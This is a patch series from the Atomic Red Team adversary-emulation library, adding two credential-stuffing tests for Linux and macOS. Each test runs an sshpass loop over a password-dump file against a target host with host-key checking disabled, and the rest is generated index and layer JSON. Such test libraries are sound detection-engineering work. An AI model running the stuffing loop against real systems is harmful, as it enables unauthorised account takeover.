TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9cb1ac61..fd5147ce 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -831,7 +831,72 @@ credential-access: x_mitre_contributors: - Diogo Fernandes - Anastasios Pingios - atomic_tests: [] + identifier: T1110.004 + atomic_tests: + - name: SSH Credential Stuffing From Linux + auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - linux + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || + [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo + apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + +' + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done + - name: SSH Credential Stuffing From MacOS + auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + description: 'Using username,password combination from a password dump to login + over SSH. + +' + supported_platforms: + - macos + input_arguments: + target_host: + description: IP Address / Hostname you want to target. + type: String + default: localhost + dependency_executor_name: bash + dependencies: + - description: 'Requires SSHPASS + +' + prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" + brew install hudochenkov/sshpass/sshpass + executor: + name: bash + elevation_required: false + command: | + cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ + for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done T1552.001: technique: id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md new file mode 100644 index 00000000..54dcd9de --- /dev/null +++ b/atomics/T1110.004/T1110.004.md @@ -0,0 +1,115 @@ +# T1110.004 - Credential Stuffing +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1110/004) +
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. + +Credential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. + +Typically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following: + +* SSH (22/TCP) +* Telnet (23/TCP) +* FTP (21/TCP) +* NetBIOS / SMB / Samba (139/TCP & 445/TCP) +* LDAP (389/TCP) +* Kerberos (88/TCP) +* RDP / Terminal Services (3389/TCP) +* HTTP/HTTP Management Services (80/TCP & 443/TCP) +* MSSQL (1433/TCP) +* Oracle (1521/TCP) +* MySQL (3306/TCP) +* VNC (5900/TCP) + +In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
+ +## Atomic Tests + +- [Atomic Test #1 - SSH Credential Stuffing From Linux](#atomic-test-1---ssh-credential-stuffing-from-linux) + +- [Atomic Test #2 - SSH Credential Stuffing From MacOS](#atomic-test-2---ssh-credential-stuffing-from-macos) + + +
+ +## Atomic Test #1 - SSH Credential Stuffing From Linux +Using username,password combination from a password dump to login over SSH. + +**Supported Platforms:** Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_host | IP Address / Hostname you want to target. | String | localhost| + + +#### Attack Commands: Run with `bash`! + + +```bash +cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ +for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Requires SSHPASS +##### Check Prereq Commands: +```bash +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; +``` + + + + +
+
+ +## Atomic Test #2 - SSH Credential Stuffing From MacOS +Using username,password combination from a password dump to login over SSH. + +**Supported Platforms:** macOS + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| target_host | IP Address / Hostname you want to target. | String | localhost| + + +#### Attack Commands: Run with `bash`! + + +```bash +cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/ +for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done +``` + + + + +#### Dependencies: Run with `bash`! +##### Description: Requires SSHPASS +##### Check Prereq Commands: +```bash +if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" +brew install hudochenkov/sshpass/sshpass +``` + + + + +
From 130328dafc7f5c9774ca206fa674b3353aefe199 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Fri, 11 Jun 2021 20:04:34 +0000 Subject: [PATCH 33/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1036.005/T1036.005.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 4c81dd2d..2dc6b7b9 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -4,6 +4,7 @@ display_name: 'Masquerading: Match Legitimate Name or Location' atomic_tests: - name: Execute a process from a directory masquerading as the current parent directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index f60266d0..6b32dc04 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -718,3 +718,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 437b2003-a20d-4ed8-834c-4964f24eec63 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b +812c3ab8-94b0-4698-a9bf-9420af23ce24 From ecc7d70057bcbfb2879c763651393347e27d21ce Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 11 Jun 2021 20:04:40 +0000 Subject: [PATCH 34/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer-macos.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-CSV/macos-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/linux-index.md | 3 +- .../Indexes/Indexes-Markdown/macos-index.md | 3 +- atomics/Indexes/Matrices/linux-matrix.md | 2 +- atomics/Indexes/Matrices/macos-matrix.md | 2 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/index.yaml | 28 ++++++++++- atomics/T1036.005/T1036.005.md | 47 +++++++++++++++++++ 14 files changed, 89 insertions(+), 10 deletions(-) create mode 100644 atomics/T1036.005/T1036.005.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 969f8c8f..cdeac0bd 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 018c33c7..0a502e83 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},